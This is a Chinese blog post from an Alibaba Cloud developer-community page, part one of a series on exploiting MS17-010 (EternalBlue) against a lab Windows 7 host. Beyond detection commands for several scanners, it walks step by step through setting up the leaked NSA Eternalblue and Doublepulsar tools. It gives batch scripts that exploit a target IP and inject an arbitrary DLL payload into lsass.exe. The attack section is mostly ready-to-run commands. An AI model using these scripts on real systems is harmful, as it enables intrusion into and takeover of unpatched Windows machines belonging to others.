AI 助理
备案控制台
开发者社区 安全 文章 正文

域渗透|浅谈MS17010多种打法(一)

2023-02-14 579
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: 域渗透|浅谈MS17010多种打法
  • 本文主要介绍NSA原版MS17-010利用
  • metasploit 利用网上太多了,这里就不介绍了

漏洞介绍

漏洞名称:永恒之蓝

漏洞编号:MS17-010,CVE-2017-0143/0144/0145/0146/0147/0148

漏洞类型:缓冲区溢出漏洞

漏洞影响:Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; Windows Server 2016

实验环境

kali

  • ip:192.168.0.18


win7

  • ip:192.168.0.28

a63fdfd1bafc54657576417d94a181ef_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

53dc88861dca073f8cf289fcb0b7b436_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

015a543d999012e7ee663542adfa4b63_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

109bff5ebf4dea7da39f7e1fcfd202cf_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

MS17010检查

checker.py

GitHub:https://github.com/worawit/MS17-010

python2 checker.py 192.168.0.28

205b847198fd8cb4762ad91af1789d10_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

check.bat

GitHub:https://github.com/3gstudent/Smbtouch-Scanner

新建check.bat

@Smbtouch-1.1.1.exe --TargetIp %1 --OutConfig 1.txt
check.bat 192.168.0.28

76d479418df5d191e60aca5c393892cc_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

Ladon

Ladon.exe 192.168.0.28 MS17010

c7bd5db347dd7aeb95a58417a1c86385_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

fscan

fscan -h 192.168.0.28

3c26b78ccd0241d67486a0ec0801c523_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

总之方法有很多,选择自己喜欢的

MS17010利用

有防火墙

参考:

本人没成功,终究还是太菜了

【MS17010打法】 https://www.bilibili.com/video/BV1Ye4y1k7X9/?share_source=copy_web&vd_source=2eb72ea5238fe3398c820713b04697ff

无防火墙

环境和上面不一样,但是不影响

Github:

  1. https://github.com/x0rz/EQGRP_Lost_in_Translation

将工具包中以下三个目录中的文件拷贝到同一个目录中(因为64位系统是支持32位的,所以直接复制32位的就好):

windows\lib\x86-Windows\

windows\specials\

windows\payloads\

然后在目录中,把Eternalblue-2.2.0.0.xml文件重命名成Eternalblue-2.2.0.xml,Doublepulsar-1.3.1.0.xml改为Doublepulsar-1.3.1.xml

为了方便使用,编写bat脚本

attack.bat 192.168.0.28

@echo off
echo =============== [ TargetIp: %1 ] ===============
Eternalblue-2.2.0.exe --InConfig Eternalblue-2.2.0.xml --TargetIp %1 --TargetPort 445 --Target WIN72K8R2

backdoor.bat 192.168.0.28 exp.dll

@echo off
echo ================================================
echo [info] TargetIp: %1
echo [info] Architecture: %2
echo [info] DllPayload: %3
echo ================================================
Doublepulsar-1.3.1.exe --InConfig Doublepulsar-1.3.1.xml --TargetIp %1 --TargetPort 445 --Protocol SMB --Architecture %2 --Function RunDLL --DllPayload %3 --payloadDllOrdinal 1 --ProcessName lsass.exe --ProcessCommandLine "" --NetworkTimeout 60
  1. https://github.com/Telefonica/Eternalblue-Doublepulsar-Metasploit

deps文件夹,在目录中,把Eternalblue-2.2.0.0.xml文件重命名成Eternalblue-2.2.0.xml,Doublepulsar-1.3.1.0.xml改为Doublepulsar-1.3.1.xml

2d0ef6f69cb52e2994c69cbf4c01c22e_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

编写bat脚本,使用方法和上面一样

@echo off
echo =============== [ TargetIp: %1 ] ===============
Eternalblue-2.2.0.exe --TargetIp %1 --Target WIN72K8R2 --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig outlog.txt
@echo off
echo ================================================
echo [info] TargetIp: %1
echo [info] Architecture: %2
echo [info] DllPayload: %3
echo ================================================
Doublepulsar-1.3.1.exe --InConfig Doublepulsar-1.3.1.xml --TargetIp %1 --TargetPort 445 --Protocol SMB --Architecture %2 --Function RunDLL --DllPayload %3 --payloadDllOrdinal 1 --ProcessName lsass.exe --ProcessCommandLine "" --NetworkTimeout 60


文章标签:
Windows
网络安全
安全
亿人安全
目录
相关文章
1508026077072612
|
网络协议 网络安全 CDN
「红队建设」Domain Fronting隐藏C2服务器技术
「红队建设」Domain Fronting隐藏C2服务器技术
1508026077072612
373 0
亿人安全
|
安全
域渗透|浅谈MS17010多种打法(二)
域渗透|浅谈MS17010多种打法
亿人安全
338 0
域渗透|浅谈MS17010多种打法(二)
数据驱动智能
|
数据管理 测试技术
多域MDM与多个域MDM:区别比你想象的要大
最近,出现了一种新的MDM趋势,供应商开始部署预构建的单域应用程序(例如,客户MDM、产品MDM等),声称通过这些应用程序的组合提供了真正的多域MDM功能。
数据驱动智能
199 0
王吉伟
|
网络协议 大数据 5G
大连接时代到来的十大标志之一:用户、战略与网络基础建设
根据中国互络信息中心近日发布的《中国互联网络发展状况统计报告》显示,截至2016年12月,我国网民规模达7.31亿,2016年共计新增网民4299万人,互联网普及率达到53.2%。在这组数据中,手机网民占比达6.95亿,因为老人与儿童可能不会操作PC,但用手机和平板上网则相对容易。
王吉伟
178 0
大连接时代到来的十大标志之一:用户、战略与网络基础建设
王吉伟
|
人工智能 物联网 大数据
大连接时代到来的十大标志之二:连接战略已成企业共识
12月20日,中国移动宣布全面实施大连接战略,高通、华为、大唐移动等一众实力企业都为其站台,表示会全力支持其大连接战略。中移动全面启动连接战略,意味着运营商乃至整个通信产业接下来都会在连接上下功夫。运营商的发力,自然会带动更多的行业加入其中,能让更多产业快速连接互联网。
王吉伟
155 0
技术小能手
SD-WAN:从概念验证转向实施部署市场调查
技术小能手
1953 0
技术小美
|
Web App开发 安全 Java
7月第4周安全回顾 Web安全威胁目标转移 Excel成垃圾新贵
技术小美
1436 0
技术小美
|
安全 Windows
11月第3周安全回顾 小心在线欺诈 两巨头同出Top 10威胁报告
技术小美
1020 0
行者武松
|
运维 安全 网络安全
IBM指出企业应建立"三重防护"认知安全免疫系统
行者武松
1675 0
boxti
转移目标 德州仪器看上了中国工业市场
boxti
1307 0

热门文章

最新文章

  • 1
    Flutter之禅 内存优化篇
  • 2
    《Cadence 16.6电路设计与仿真从入门到精通》——2.4 Design Entry CIS原理图图形界面 
  • 3
    记一次对网络抖动经典案例的分析
  • 4
    国外成人网站xHamster大量用户信息黑市变卖,部分账号涉及英美政府官员
  • 5
    用户密码以BCrypt加密的方式来防范被破解
  • 6
    带你理清CPU,cache和存储器之间的逻辑运作
  • 7
    Git设置代理服务器
  • 8
    【DSW Gallery】PAI-DSW开通及授权
  • 9
    吐血整理:机器学习的30个基本概念,都在这里了(手绘图解)
  • 10
    MOSS站点的迁移(备份还原)
  • 1
    设计模式之 5 大创建型模式,万字长文深剖 ,近 30 张图解!
    46
  • 2
    《C++新特性:为多线程数据竞争检测与预防保驾护航》
    40
  • 3
    Kotlin - 区间与数组
    40
  • 4
    Kotlin - 参数与异常
    39
  • 5
    Kotlin - 运算符与中缀表达式
    34
  • 6
    Kotlin - 函数与Lambda表达式
    22
  • 7
    Kotlin - 分支与循环
    18
  • 8
    天气预报1天-中国气象局-地址查询版免费API接口教程
    20
  • 9
    《C++智能合约与区块链底层交互全解析:构建坚实的去中心化应用桥梁》
    19

    • 相关课程

    更多
  • 信息科技前沿技术及应用趋势
  • 互联网安全-移动APP漏洞风险与解决方案
  • 2020版大数据实战项目之DMP广告系统(第二阶段)
  • 2020版大数据实战项目之DMP广告系统(第一阶段)
  • 2020版大数据实战项目之DMP广告系统(第五阶段)
  • 2020版大数据实战项目之DMP广告系统(第七阶段)

    • 相关电子书

    更多
  • 互联网技术发展的几个观察
  • 中国SaaS用户研究报告
  • 2017年中国SaaS用户研究报告

    • 相关实验场景

    更多
  • 物联网设备安全:实时检测7类安全风险(Agentless)
    • 下一篇
    阿里云OSS设置跨域访问